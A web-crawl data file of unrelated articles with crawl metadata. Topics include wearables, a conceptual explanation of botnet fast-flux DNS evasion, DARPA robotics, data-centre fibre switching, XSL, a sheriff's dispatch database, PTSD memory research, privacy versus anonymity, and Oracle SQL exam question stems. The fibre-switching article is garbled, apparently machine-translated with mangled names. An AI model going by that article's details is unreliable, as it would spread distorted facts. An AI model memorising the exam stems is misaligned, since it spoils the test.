In an economy that monetizes private data, companies that collect or handle biometric data could potentially sell it to third parties, said Saxon. This business model raises privacy concerns, even when data is stripped of details that link it to specific individuals, and people may deserve compensation for contributing their information to a database created from wearable device data, she said.
"Even if they get some kind of service or device for free from Google, at the end of the day if that data is going to be sold should people be compensated? I don't know the answer. But if somebody plans on making money from it then we should be thinking about it," Saxon said.
Of course, finding value in and safeguarding data won't be a problem if people don't start using wearable devices in the first place, or stop using them after a while.
To get people interested in using health-oriented wearables, the devices need to offer data that users can learn from, Saxon said. To do that, the data such devices collect could be integrated with features from other applications so that, for example, a wearable user could get content on what foods to eat to increase blood sugar if it got too low.
Data and device consolidation could also boost the popularity of wearable devices, Saxon said. Instead of uploading data from five sensors to different clouds, people could use one application or device that stores their information in one place.
Ultimately, people want well-designed, reliable consumer products that fit into their lifestyles -- areas that Apple, Samsung and Google specialize in, Blum said.
"Who anticipates Apple developing something that is ugly that no one wants to wear?" Blum said.
The major tech companies have an opportunity to make a big impact on medicine, because if health IT wearable devices really take off, health care won't function the same way.
"We're on the precipice of an absolute sea change of how medicine works," Docktor said. "It's going to open up the window for more preventative care, more remote care and better monitoring of patients outside of the hospital because that's generally where 99.9 percent of their time is hopefully spent." | <urn:uuid:07aff24d-980f-4452-ad0f-d3e4dd88ea5b> | CC-MAIN-2017-09 | http://www.cio.com/article/2376612/consumer-technology/wearable-devices-with-health-it-functions-poised-to-disrupt-medicine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00436-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.966334 | 1,808 | 2.78125 | 3 |
For anyone looking to create their own global compute cloud, the botnet serves as the perfect blueprint for a resilient fault tolerant network. Lately botnets are proving to more resilient and harder to shut down then any other form of cloud technology. So needless to say we can learn a lot of our criminal counter parts.
One of the big reasons botnets are so hard to take down is in how they obscure the domain by constantly mapping to different bots within the network, according to a recently released study (PDF). This approach to fault tolerant may be the model for our work in the cloud.
The study's authors, Jose Nazario of Arbor Networks and Thorsten Holz of the University of Mannheim, tracked the traffic of 900 fast-flux domain names used by botnets within the first six months of 2008 and learn quite about the inner works of the most power botnet and specifically the use of Fast-Flux.
According to Wikipedia, "Fast-flux" is a term to describe how the botnets use constant changes in the mapping of the hard-coded domain name to different bots within the network. The Fast flux technique is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. It can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load-balancing and proxy redirection used to make malware networks more resistant to discovery and counter-measures and is ideally suited for the management of cloud based infrastructures.
The simplest type of fast flux, referred to as "single-flux", is characterized by multiple individual nodes within the network registering and de-registering their addresses as part of the DNS A (address) record list for a single DNS name. This combines round robin DNS with very short TTL (time to live) values to create a constantly changing list of destination addresses for that single DNS name. The list can be hundreds or thousands of entries long. (This is very similar to the way we handle distributing the user access / load within our Enomaly Elastic Computing Platform)
A more sophisticated type of fast flux, referred to as "double-flux", is characterized by multiple nodes within the network registering and de-registering their addresses as part of the DNS NS record list for the DNS zone. This provides an additional layer of redundancy and survivability within the malware network.
The study found that fast-flux botnets were often active for a few hours to a few months. The domains that were used were registered, but sometimes laid dormant for several months. Online fraud and crime most associated with these botnets included phishing sites, pharmacy sites, and malware distribution sites.
I'll keep you posted as I learn more about this fast flux approach. | <urn:uuid:32431c04-7c8c-49ff-a72e-c84823d9d798> | CC-MAIN-2017-09 | http://www.elasticvapor.com/2008/10/fast-flux-cloud-computing-elastic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00436-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945587 | 577 | 2.75 | 3 |
DARPA's $2M challenge: Robots that drive, use tools, stop leaks
- By Henry Kenyon
- Apr 11, 2012
In the not-too distant future, putting out hazardous chemical fires, working on damaged nuclear reactors and other dangerous emergency response jobs may be handled by robots.
The Defense Department’s cutting-edge research and development shop is looking for next-generation machines capable of working in a human environment by doing things such as driving vehicles, climbing ladders, handling power tools and turning pipe valves.
To push the boundaries of robot technology for disaster relief operations, the Defense Advanced Research Projects Agency is launching its Robotics Challenge. The structure of the challenge, which begins in October, is similar to those the agency ran in recent years to develop autonomous ground vehicles: robots developed by participating teams will compete against each other for a cash prize. In this case the winning team will be awarded $2 million.
DARPA's cheetahbot breaks speed record for legged robots
CMU team takes charge at Urban Challenge
A key thrust of the program is developing robots that can use available human tools in a disaster site, from vehicles to hand tools. DARPA also wants technologies that allow non-expert operators to control robots, lower operator workload, and permit effective operation in degraded, low bandwidth and intermittent communications environments.
The Robotics Challenge consists of three major events: a virtual disaster challenge and two disaster response challenges. Like DARPA’s previous contests for autonomous ground vehicles, the robots in this event will compete with each other. The current event will focus on disaster response scenarios in this sequence:
- Drive a utility vehicle at the site.
- Travel dismounted across rubble.
- Remove debris blocking an entryway.
- Open a door and enter a building.
- Climb an industrial ladder and move along an industrial walkway.
- Use a tool to break through a concrete panel.
- Locate and close a valve near a leaking pipe.
- Replace a component such as a cooling pump.
While the robots must be compatible with human operators, environments and tools, they are not required to have a humanoid form, DARPA officials said. But the robots must be able to get into, drive and navigate a standard, unmodified utility vehicle along a roadway.
For the other tests, robots will have to move across rubble; move along human-sized industrial ladders and walkways; detect and close leaking valves; handle power tools, and be able to locate, remove and replace a pump that a human would be able to physically carry and manipulate.
It is up to the participating teams to decide how autonomous their robots will be, DARPA officials said. Human operators will supervise the robots in all of the events, but for highly autonomous machines, this could mean only a few high-level commands via a relatively low data rate communications link. For less autonomous robots, more low-level commands and the need for more sensor data from the robot to the operator will require higher data rates.
As a part of the challenge, DARPA wants to make robot hardware and software development more accessible and to lower acquisition costs while increasing capability. The agency will create and provide Government Furnished Equipment (GFE) to some participants. Officially referred to as the GFE Platform, it consists of a man-sized robotic system with arms, legs, a torso and a head. The GFE Platform will allow teams without hardware expertise, or even hardware, to participate, agency officials said.
Along with the GFE Platform the agency will develop a GFE Simulator, an open-source, real-time, operator-interactive virtual test bed system. The simulator will run models of robots, robot components and field environments prior to physically validating them on hardware systems.
By using a widely available and affordable validation system to test software and hardware components, DARPA wants to create an environment where developers can quickly create and test new robot designs at minimal cost and with high confidence of success. | <urn:uuid:8ce912e8-f5dd-4032-9db4-d50c702f7134> | CC-MAIN-2017-09 | https://gcn.com/articles/2012/04/11/darpa-robotics-challenge-disaster-response.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00556-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.917897 | 823 | 2.734375 | 3 |
Traditional network equipment has been unable to cope with the huge data traffic
A morning in 2011, an engineer of the world’s most popular social network Facebook press a button, and the results of the company’s entire business to a standstill. This unknow the engineer who was not supposed to make mistakes. He was just trying to run the social networking giant has been in the running of a software task. He is running a distributed data analysis platform Hadoop. Results, Facebook began to analyze the data generated by the hundreds of millions of uers. These data are stored in the tens of thousands of servers on the companys’s multiple data centers. When you analyze these data, all those servers must begin to talk to each other.
It is said that Facebook employees Dorn Lee mermories of the accident on the meeting in the spring of last year, a Hadoop task let the company’s computer network was overwhelmed, and lead to other business is almost at a standstill. “I clearly remember that morning.” Lee said, “It to let Facebook paralyzed, very serious paralysis.”
In the past, the majority of network data traffic is transmitted back and forth between the server and Internet users trying to access the web. But now, with the increasingly large and complex business such as Facebook, Google and Amazon appear within the data center and server data traffic increased, these traditional network equipment used networking giant has been unable to handle so much traffic.
Therefore, the network is taking place in the times change. Companies such as Facebook and Google is building more high-speed network hardware, they are revising their network topology, to accommodate the large flow of transmission between the server. However, such improvements effect is not obvious. Like Donne – Lee this network experts have begun to consider new network equipment – available beam propagation data equipment in the data center configuration.
Electronic and optical fiber network neck and neck
Yes, certain Internet data has started in the form of light to be transmitted. This is the fiber optic network. Standard electronic signals are converted into photos, and to be transmitted along the glass fiber optic cable.
However, under normal circumstances, such data transfer typically occurs between the data center, which rarely occurs within the data center. The next step is staring fiber-optic network to re-build the data center, so that the traditional electronic network switches can greatly accelerate the speed of data transmission between the server fabric switches neck and neck.
“If we can do this, this hybrid network– can be adapted to large-scale network of more data traffic- very attractive.” God Diego campus of the University of California researcher George fiber optic network George Papen said, ” We are yet to reach this point, but we are closer than ever before.”
Papen school district where the R & D team has developed the hybrid network, the network is still in the testing phase, and demonstrate the working principle of the fiber optic switches. Their research projects, usually known as Helios, is funded by Google and other tech giants.
According to Papen, Helios project to be fully realized, there is still a long way to go. However, in Cambridge, Massachusetts, USA, a start-up companies named Plexxi recently launched a fiber optic network switches designed to re-create the data center. Although this technology is completely different from Helios, but they have the same basic goal.
“Photonic switching function is very powerful, once your business is involved in the field of optical fiber exchange, rather than the field of electronic exchange, you will have the advantage of internal performance.” CEO David – Plexxi Company, said Husak (Dave Husak)”We are committed to achieve that effect.”
Future of the Helios project
Traditionally speaking, the network is hierarchical. If your server will be classified as a level above this level is the network switch, you need these servers are connected to the network switches. Then, you will these “high-level switch connected with higher levels of high-speed networking equipment; Next, your network equipment to connect these two levels of network equipment and a higher level. When you reach the core of the network, you run the very expensive network hardware is much faster than the switch on the server level.
You need this faster speed to adapt to all traffic from the network- this is perhaps our previous view. Amin Vahdat and colleagues show that this hierarchy is wrong. If you use the speed is generally cheaper network equipment, you may be more efficient to run your network.
“This is a revolution.” Papen said, “Before this, people like the construction of telecommunications networks to build their data center, Vahdat of the research team realized that to do so is difficult to cost savings, they proved that you can use a completely different way to build a data center. “
This unified network architecture is known as a “fat tree” architecture design. It has now become a universal form of large-scale network business. That’s why companies such as Google have begun to abandon the expensive equipment such as Cisco, switch from a manufacturing company in Asia to purchase low-cost hardware.
Helios project, the basic idea is to create a true fiber-optic network, eliminating the burden of the traditional electronic networks.
In a sense, this project will be back to the future. Today’s network uses a so-called “packet- switching to transfer data back and forth, first break them into smaller flow of information before the output data. This is the way of the operation of the Internet. However, the fiber portion of the Helios project is a “circuit-switching”, to establish a dedicated link between two endpoints. This is the old-fashioned mobile network run.
“Just look at each packet in the data center, you will find that it does not have to use your resources efficiently.” Papen said, “If you can understand, even partially understand the transmission of data traffic direction, you do not have to view each header of each packet, you will be able to create a dedicated circuit to transmit large amounts of data, rather than let it through the packet-switched network. ”
This structure is very attractive, because the fiber optic circuit-switched networks are more flexible than the traditional design. “Circuit is a pipeline, it don’t care about the data transmission speed is it, it is speed agnostic.” He said, ” you can almost any speed data transmission in the above, it is very attractive.”
While this architecture to become the reality of the data center, there is still a long way to go, but Papen believe it will eventually be realized.
Vahdat and Google is likely to be close to reality, but Papen stressed that even he doesn’t know how Google will do. “I have a lot of friends engaged in fiber in large data centers, however, i still do not know what they are prepared to do,” he said.
Google, it is the most important competitive advantage is the design of its internal architecture. Google even outside researchers funded it, do not want to disclose this design. But, Google switched fabric is not only explore the future of the company. The company doing Facebook, Cisco, IBM and now Plexxi Company. | <urn:uuid:e3eca314-35c0-4a8a-a045-91cfcf4e4ae0> | CC-MAIN-2017-09 | http://www.fs.com/blog/google-and-facebook-how-to-use-fibre-network-upgrade-transmission-speed.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00076-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952348 | 1,543 | 2.890625 | 3 |
What is it?
Extensible Stylesheet Language (XSL) is a style sheet format for XML (Extensible Markup Language) documents. It is the XML counterpart to the Cascading Style Sheets (CSS) language in HTML (Hypertext Markup Language).
Unlike HTML, which uses predefined tags (for instance, < p > meaning paragraph) that are understood by browsers, there is no standard way of displaying an XML document. As the World Wide Web Consortium (W3C) puts it, "An XSL stylesheet processor accepts a document or data in XML and an XSL stylesheet, and produces the presentation of that XML source content that was intended by the designer of that stylesheet."
Where did it originate?
With the W3C. The XSL Working Group, formed in 1998, is co-chaired by IBM and Adobe. It is based on two older stylesheet languages, CSS and the Document Style Semantics and Specification Language (DSSSL). XSL is intended to be suitable for the general user as well as the professional, whereas DSSSL is strictly for the expert. CSS and XSL are complementary. XSL can transform XML documents into CSS/HTML documents which CSS can then format.
Microsoft played a benign role in the development of XSL. Deciding that XSL was too complex and too broad in its approach, since most people simply wanted to output HTML, it took the transformation aspects of XSL and ran with them. As a result, XSL was split into two: XSL itself, also known as XSL Formatting Objects (XSLFO), and XSL Transformation (XSLT).
What is it for?
XSL provides a model and vocabulary for writing stylesheets using XML syntax. According to the W3C, presentation means "how the source content should be styled, laid out, and paginated onto some presentation medium, such as a window in a Web browser or a handheld device, or a set of physical pages in a catalogue, report, pamphlet, or book".
The XSL Working Group says, "Aimed, by and large, at complex documentation projects, XSL has many uses associated with the automatic generation of tables of contents, indexes, reports and other more complex publishing tasks."
What makes it special?
Without a stylesheet, a processor would render the content of an XML document as a string of undifferentiated characters. XSL provides much more flexible and sophisticated layouts and pagination than were possible before.
How difficult is it?
The term "human-readable" makes XML and XSL seem like something anybody can pick up, but Chris Harris-Jones, a consultant with analyst firm Ovum, warns that this is true only in the same way that all European languages are human-readable. "You need to understand the tag sets they are written in," he explains.
There is a good selection of tools to make XSL easier, including ActiveState's Komodo, Excelon's Stylus Studio and IBM's XSL Editor.
Where is it used?
Wherever XML documents are used.
What does it run on?
XSL, like XML, is supplier- and platform-neutral - although there were compatibility problems with Internet Explorer 5.0, which was released before the XSL standard was firmed up.
Few people know that
XSL can be entertaining. See the IBM paper "XSL for Fun and Diversion" at www-106.ibm.com/ developerworks/library/hands-on-xsl. Alternatively, try to get out more.
What is coming up?
XML schemas for UK local elections.
Rates of pay
XML, along with XSL, is used in almost very kind of software and database development, and the range of salaries is correspondingly large.
There are dozens of free XSL tutorials online. Try the W3C Web site (www.w3c. org/Style/XSL), www. w3schools.com and IBM's Developerworks (www-106.ibm.com/ developerworks), for starters. | <urn:uuid:a96a9abc-b008-403b-9d17-11fff198482e> | CC-MAIN-2017-09 | http://www.computerweekly.com/opinion/Hot-skills-Putting-style-into-XML-presentations | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00604-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.923086 | 860 | 3.96875 | 4 |
Before he lost the ability to sleep through the night; before the panic attacks started; before he drove his truck over an improvised explosive device, leaving him with traumatic brain injury; before a second roadside bomb did the same thing a few weeks later—before all of that, on the U.S. military base near Kandahar, Afghanistan, soldier Kevin Martin liked to think about the science-fiction movie Inception.
“My friends and I used to joke during our time in Afghanistan that we were going to take all the money we had and pay someone to Incept us,” he says—referencing the film’s premise of implanting or extracting information from a person’s mind as they sleep—“so that we could put a cooler, not-as-bad memory of Afghanistan in our brains and go on with the rest of our lives.”
Thus far, no such treatment exists for Martin, 23, who returned to the U.S. in 2012 and was diagnosed with post-traumatic stress disorder earlier this year. Now a sophomore at Trinity College, he’s considered 30 percent disabled by the Department of Veterans Affairs for his PTSD (he’s also 10 percent disabled for an unrelated shoulder injury) and takes prescription anti-anxiety medication to ease his symptoms.
But researchers have begun to investigate a possible treatment similar to the one Martin imagined: A paper recently published in the journal Biological Psychiatry argues that it may be possible to treat PTSD by altering patients’ memories.
The paper reviews a growing body of scientific literature on memory reconsolidation, a relatively new (and, in humans, still somewhat contentious) concept in which old information is called to mind, modified with the help of drugs or behavioral interventions, and then re-stored with new information incorporated—like a piece of metal that’s been melted down, remolded, and left to harden into a different shape.
Though different types of memories are solidified in different ways—the fear-driven memory of driving over a bomb, for example, will make its way through the brain differently than a mundane memory of yesterday’s breakfast—there are general neurological processes that all memories follow.
“In memory research, we talk about three parts,” explains Ken Paller, director of the cognitive neuroscience program at Northwestern University. “The first part is the acquisition or coding of a memory,” in which our brains process the information our senses are sending, “and the last part is retrieving a memory. And in between, we talk about consolidation,” the process by which sensory information—a sight, a taste—solidifies into fully-formed memories to be stored for the long term.
Typically, the more often memories are recalled, the stronger they become. “If you’re trying to memorize something in a book, you sit there and repeat it over and over,” explains Wendy Suzuki, a researcher at New York University’s Center for Neural Science. “That’s also an example of how things get consolidated. You repeat [them] over and over.”
But with reconsolidation, the researchers explain, consciously recalling a memory is also what allows it to be manipulated. “[Memories] are not necessarily fixed but can be changed long after storage,” they write. “Seemingly stable memories may re-enter an unstable state when they are retrieved, from which they must be re-stabilized … During reconsolidation, memories are susceptible to modification again.”
One way is by distracting the brain as it recalls, or “activates,” memories: People who were asked to memorize two separate lists of objects, for example, did worse on the second list after they were reminded of content from the first, while people who were asked to memorize a folk tale before recalling autobiographical events described their memories in less detail than those who had not seen the story.
Perhaps more compelling for the treatment of PTSD, though, are the experiments that involve tampering with fear-driven memories using pharmaceuticals. In one study, published in Nature Neuroscience, volunteers were stimulated to generate fear memories after being subjected to loud noises and images of spiders; later on, one group was given propranolol (a beta-blocker used to slow heartbeat and sometimes used in the treatment of anxiety disorders) before being made to recall the fearful experience, while the other was given placebo pills. When the two groups were again reminded of the memory days after the experiment began, those who had taken the propranolol showed markedly less fear than those who had not.
A study from the journal Psychneuroendocrinology found a similar effect with propranolol in subjects who were asked to imagine a fearsome event that hadn’t actually happened—when they were made to recall the imagined scenario, the chemical eased their response much as it had done in experiments with real fear memories. (People with PTSD, it bears noting, can exhibit symptoms of the disorder even if it was someone close to them who actually experienced the trauma; journalists frequently exposed to violent images can develop PTSD even from the safety of their newsrooms.)
Compared to Martin’s hypothetical Inception scenario, the types of modification discussed in the research review are decidedly less dramatic. Based on the studies presented, reconsolidation appears to be much less heavy-handed than its science-fiction analogue—a lessening of the emotions associated with the memory or the dulling of its details, rather than the total mental eradication of an event or the creation of a new one from scratch.
But still, the idea of reconsolidation broaches new territory for possible relief from PTSD, which affects an estimated 7 to 8 percent of Americans, by addressing its root cause rather than its symptoms. Cognitive processing therapyand exposure therapy, two common behavioral treatments, focus on coping skills and controlling fear, and according to the National Institutes of Mental Health, only two medications—the antidepressants Zoloft and Paxil—are currently approved by the U.S. Food and Drug Administration explicitly for the treatment of PTSD, though other antidepressants and anti-anxiety medications are often prescribed to treat the emotional effects characteristic of the condition.
Some psychologists, however, remain skeptical that this particular area of memory research is the answer.
Despite the findings of some of the studies addressed in the Biological Psychiatry review, the bulk of the research on reconsolidation thus far has involved lab animals rather than humans, explains Paul Reber, director of Northwestern University’s Brain, Behavior, and Cognition program—and mapping rodent brains doesn’t provide adequate insight to the intricate, messy workings of human memory, where something as seemingly inconsequential as a smell or a snippet of music can pull forward a rush of emotions from events past.
“In animal studies, you have the greatest control over the neural systems, but you don’t have any access to the subjective experience of memory,” he says. “So you can build models of things you think might be related to what humans experience with PTSD, but you don’t really know how they’re connected.”
Paller, too, questions the faith that some have placed in reconsolidation, arguing that it stems from an oversimplified understanding of the way that memories are processed in the first place. Rather than something that must be de-stabilized in order to change, a memory is a constantly shifting entity, continually updated with new context even when it isn’t being consciously recalled.
“It’s a lot different than when you put some information in your computer and just expect to get that out in the same form,” he explains. “If you learn something on a Wednesday and you learn new information the next day, that can change the memory that you stored. So every time that we learn something, subsequent events can color it differently.”
”The more sophisticated view of consolidation is, [it] can strengthen a memory, but it doesn’t reach a permanent stage ever,” he says.
Whether or not reconsolidation is a viable possibility for PTSD treatment may still be up for debate; whether or not it should be a possibility, though, is another question altogether.
Slippery philosophical quandaries abound: Does the act of taking a pill to change memory require different ethical considerations than something like psychotherapy or hypnotism? Could it pave the way for more ominous applications? And is the altering of memories a humane way of helping those who suffer, or is it some fundamental violation of what makes humans, well, human?
But on the flip side, if some people are biologically predisposed to PTSD, wouldn’t this be a way of leveling the playing field, of helping people unlucky enough to become victims of their bodies’ own chemistry?
“People say, ‘Well, it’s just wrong to interfere with the natural in the realm of memory,’” says Peter Kramer, a psychiatry professor at Brown University who studies medical ethics, “but the natural in the realm of memory does involve reshaping and forgetting. Maybe the injury is more like the unnatural.”
As the body of existing reconsolidation research expands—and as soldiers continue to return home burdened by the trauma of their experiences—it’s an issue that those who study the brain are likely to grapple with more and more often.
“I was at a conference not that long ago where the idea was brought up,” Reber says, “and it led to a lot of animated discussion: If you could edit your own memories, are there any memories you’d want to get rid of? If you have a memory of a painful event, do you lose some part of yourself if you get rid of it? Would that be worth the trade?”
“Obviously,” he adds, “it’s not a simple question.” | <urn:uuid:4b70b45b-0504-4c8f-a954-3adec575a45f> | CC-MAIN-2017-09 | http://www.nextgov.com/health/2014/08/changing-memories-treat-ptsd/92585/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00604-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958354 | 2,079 | 2.765625 | 3 |
Los Angeles County is the largest county in the nation. Its population of approximately 9.9 million is exceeded by only eight states.
There are 88 cities in L.A. County, covering a geographic span of 4,081 square miles. Yet 65 percent of the county -- home to a million people -- remains unincorporated. Those people and the citizens of some 40 of the 88 cities look to the men and women of the Los Angeles County Sheriffs Department -- the largest sheriffs department in the world -- for police protection.
To handle the enormous number of calls generated by such a Herculean endeavor, the sheriffs dispatch system was overhauled in the early 90s. The Mobile Digital Communications System (MDCS) that resulted allows patrol officers to receive calls and acknowledge them through a mobile digital terminal (MDT). The MDT can also query online against justice agency databases such as the Department of Motor Vehicles and the Wanted Person System.
Unfortunately, the deployment of one tool sometimes renders another obsolete or, worse, unusable. So it was with the Mobile Digital Communications System and the original Regional Allocation of Police Services System (RAPS). RAPS is a data-management system that tracks the activities of deputies in the field for the purpose of billing contract cities and to determine the appropriate allocation of personnel.
The old RAPS system was housed on a mainframe and obtained its data from paper logs prepared by deputies. This data was used to justify additional sales of service to contract cities. The reports also helped law enforcement determine if a particular area needed more law enforcement attention.
However, according to Sergeant John Aerts, who was responsible for billing some of the contract cities, the reports were often late. "I would get the reports a month late. In May I would know that I had been 600 minutes short in a particular city [in April]."
But once MDCS eliminated the need for the paper log, those reports went from late to non-existent. Suddenly, L.A. County had no way to track deputies, gather data or compile statistics.
The solution was a program that could receive data directly from the dispatch system, store it and present it in a useful manner. The system would bear the name RAPS, the same name of the system it replaced.
David Ramirez, currently the Data Center manager for the L.A. County Sheriffs Department, was working for the county at that time as a consultant to the sheriffs department and became the main developer of the system. "We developed an application using Oracle RDBMS and tools that captured the data directly from the dispatch system," said Ramirez. "It still carries the same name, but is radically different technology."
Because it was to be an enterprise-wide system, a steering committee was appointed. Twelve RAPS coordinators were selected to serve on the steering committee, one of whom was Sgt. Aerts. Ramirez considered this an asset. "We would not have been able to do it without Johns expertise in the departments business practices ... He has a better understanding of community needs than anyone and wanted to make sure the system could provide statistics to justify the allocation of additional manpower in the communities."
Sgt. Aerts looked at RAPS as a way to make life easier. "It gives you a daily or monthly look at exactly where you are. You know if you are short and have to add cars in a particular area."
RAPS captures data from the MDCS in a download every 24 hours at 4 a.m. The data is processed and stored and available online via Oracles Forms Graphic User Interface. "It was designed," Ramirez said, "to be intuitive and totally user friendly."
There are currently about 10 years worth of data on the system. The data is up-to-date within the 24-hour timeframe that it takes to be downloaded from MDCS.
While MDCS allows for realtime inquiries, the data is only available for seven days and there is no historical record of changes to it. RAPS captures and processes all changes to the records during the seven days it is retained in MDCS.
RAPS captures data such as how many times a patrol vehicle has been dispatched to a particular location and how much time deputies spend in various activities. From the moment he or she signs on to the system, the deputys time is tracked. Each time the deputy acknowledges a call or begins or ends an activity, a time stamp is created.
Wendy Harn, assistant director of Management Information Services for the sheriffs office, is a user of the system. "RAPS basically automated the Deputy Daily Log, which was a manual system of logging all deputy activities on a shift," she said. "It contains call history by location, observation activity and detail activity. Information is available by location, unit, station, call types, etc."
Once data is entered, it cannot be changed. "RAPS is a read-only system," said Ramirez. "The user has the ability to download the data onto a spreadsheet and massage it if desired. But the data within RAPS is legally binding and must reflect the original MDCS data."
Harn, whose department is responsible for reporting crime statistics, the crime analysis program and GIS, said RAPS helps the communities within the county because it "allows for more efficient monitoring of the types of service being provided and where."
She also believes it aids officer safety by providing online access to address history, so an officer knows in advance whether there have been previous problems in a particular area and whether or not back-up will be needed.
Overall, RAPS provides the Los Angeles County Sheriffs office with data showing how deputies spend their time. It also ensures the contract cities get their moneys worth, helps protect officers by providing historical information about people and places, and improves public safety by putting police protection where it is needed most.
Car 54, we found you. | <urn:uuid:8f155216-61eb-4dcb-acca-649ba821b1a9> | CC-MAIN-2017-09 | http://www.govtech.com/magazines/gt/Car-54-Where-Are-You.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00304-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962411 | 1,214 | 2.625 | 3 |
Evaluate the SQL statement: TRUNCATE TABLE DEPT; Which three are true about theSQL statement? (Choose three.)
You need to design a student registration database that contains several tables storingacademic information. The STUDENTS table stores information about a student. TheSTUDENT_GRADES table stores information about the student’s grades. Both of the tableshave a column named STUDENT_ID. The […]
Here is the structure and data of the CUST_TRANS table: Exhibit: Dates are stored in thedefault date format dd-mm-rr in the CUST_TRANS table. Which three SQL statementswould execute successfully? (Choose three.)
See the Exhibit and examine the structure and data in the INVOICE table: Exhibit: Whichtwo SQL statements would executes successfully? (Choose two.)
Which three statements are true regarding sub queries? (Choose three.)
See the Exhibit and examine the structure of the CUSTOMERS table: Using theCUSTOMERS table, you need to generate a report that shown the average credit limit forcustomers in WASHINGTON and NEW YORK. Which SQL statement would produce therequired result?
Evaluate these two SQL statements: SELECT last_name, salary, hire_date FROMEMPLOYEES ORDER BY salary DESC; SELECT last_name, salary, hire_date FROMEMPLOYEES ORDER BY 2 DESC; What is true about them?
Where can sub queries be used? (Choose all that apply)
Which three SQL statements would display the value 1890.55 as $1,890.55? (Choosethree.)
Evaluate the following SQL statement: Which statement is true regarding the outcome of theabove query? | <urn:uuid:400d75fd-be78-4ef3-928d-e0f83b7b11ef> | CC-MAIN-2017-09 | http://www.aiotestking.com/oracle/category/exam-1z0-051-oracle-database-11g-sql-fundamentals-i-updated-april-20th-2016/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00480-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.837901 | 364 | 3.328125 | 3 |
Dr Louise Bennett explains the difference between security, secrecy, privacy and anonymity online.
At a roundtable hosted by Silent Circle, Dr Louise Bennett, chair of the Security Community of Expertise, talked about the issues in differentiating security, secrecy, privacy and anonymity online.
"The real balancing act between security and privacy is between notifications and the right to privacy," says Dr Bennett. "This is what people get upset about in companies like Google with the commercialisation of the internet and government surveillance. It’s because these things have been linked together without the permission of the individual or they cross things that I don’t give my consent to share with anybody else.
"We all know that there are a lot of different commercial models on the internet. Some services are free or below cost because of the value of data that you as a customer give up when you use the site. And the quid-pro-quo is usually targeted advertising. Young kids I talk to say, ‘Facebook is free, and that’s wonderful.’ But Facebook is not free, get real! You’re putting all this personal data out there and often they don’t know the privacy settings so this can be seen by anybody and this is then used to target you.
"The key thing is how do you keep control of your data and personal information? Well statistics will tell you, you can’t on the internet. Once it’s out there, it’s out there. If someone is determined to find your data, you’ve got a problem.
She stresses: "We have to understand that identity on the internet can be used as currency and can be gathered through Big Data aggregation and Big Data analytics and you have to decide to what extent you are prepared to use your identity attributes as payments for services you want. But you have to be aware of it and make your own choice."
She also highlights the second balancing act, which puts security and secrecy on one side and privacy and anonymity on the other. "I think there are really significant differences between privacy and anonymity. I would say that on the internet, anonymity is the ability to perform actions without them being traced to a person; they can trace them to the thing, but not the person."
Dr Bennett draws out the pros and cons of anonymity by stating that it can ensure individuals have the right to free speech without fearing the repercussions. But also, people can’t be easily identified and held to account if they are anonymous.
Alternatively, she describes secrecy as what is known but not to everybody. Secrecy is what the intelligence services strive for. On the other hand, privacy is the ability to provide information to those who only we want provides the information to under our own free will.
"Privacy protects people and doesn’t per say damage national security or law enforcement. But some would say it does. It does make those things harder to achieve. But I would say anonymity does cause damage," she says.
"Some of the only people who have really chosen to be anonymous are the people in Anonymous and LulzSec. They know the persona and the avatar, but they didn’t know the biological person before they got together. Anonymity isn’t necessarily for privacy but it is often misinterpreted as being synonymous with privacy. Activists in the Arab Spring say they wanted anonymity, but they didn’t because if they had anonymity they wouldn’t have been known to their friends and could have been compromised by the state. What they wanted was privacy from the state. That is not the same thing.
"I think privacy overlaps security; they go hand-in-hand and what advocates for privacy really want is security for the individual from the intrusion into their personal life or targeted action. You have two groups of people: advocates of strong unique electronic identities for national security purposes will often come from countries like China and countries with oppressive regimes," explains Dr Bennett.
On the side of those who are anti-anonymity, there are arguments that with the shield of anonymity, individuals can stalk, masquerade as others, they can be liable and will get into organisations to steal and defraud. Anonymous terrorists can plan, radicalise and perform cyber attacks and activists can compromise businesses and publish confidential information. Anonymity essentially removes accountability and makes the job of law enforcement much harder in the virtual world than it is in the physical world.
For those who are pro-anonymity and oppose electronic identities argue that there are those who use anonymity with good intent: whistleblowers who unveil wrongdoings of powerful individuals or organisations. Individuals can partition their lives or limit damage caused by people stealing their identities. They’ll say that individuals with anonymity can avoid discrimination, escape abusive relationships and regimes and start a new life. Activists with a vested interest can give a voice to the silent majority. Anonymity protects the weak individual from abuse by the powerful.
"Most people are probably on both sides of the argument: it isn’t as simple as that," says Dr Bennett.
"There is an enormous amount of work being done across the world, security, privacy and anonymity: how they work against each other and how they overlap. There is never going to global agreement over the rationality of these different things, what we have to work towards is global understanding of people’s perspectives and an understanding of the context."
